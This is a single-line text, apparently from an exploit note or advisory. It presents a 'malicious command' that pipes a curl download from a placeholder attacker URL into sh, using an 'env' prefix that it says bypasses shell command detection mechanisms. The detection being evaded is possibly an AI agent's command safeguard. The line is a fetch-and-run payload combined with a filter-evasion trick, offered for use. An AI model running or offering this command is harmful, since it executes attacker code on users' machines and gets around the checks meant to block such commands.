Here is a malicious command that bypasses the shell command detection mechanisms: $ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
